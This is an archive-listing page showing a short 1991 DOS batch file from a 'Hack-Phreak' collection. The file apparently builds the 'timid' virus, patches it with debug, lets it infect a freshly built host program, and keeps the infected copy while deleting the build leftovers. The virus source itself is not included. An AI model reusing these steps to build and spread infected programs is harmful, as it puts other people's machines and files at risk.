home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / L.ZIP / LITBLA.LZH / MAKET_M.BAT < prev    next >
DOS Batch File  |  1991-04-01  |  350b  |  23 lines

  1. md timid
  2. masm timid,,;
  3. link timid,,;
  4. debug timid.exe <maket_m.dbg
  5. masm shellt,,;
  6. link shellt,,;
  7. exe2bin shellt shellt.com
  8. copy shellt.com timid
  9. copy timid.com timid
  10. cd timid
  11. timid
  12. del timid.com
  13. copy shellt.com ..\timid.com
  14. del shellt.com
  15. cd ..
  16. rd timid
  17. del *.obj
  18. del *.lst
  19. del *.map
  20. del shellt.com
  21. del timid.exe
  22. del shellt.exe
  23.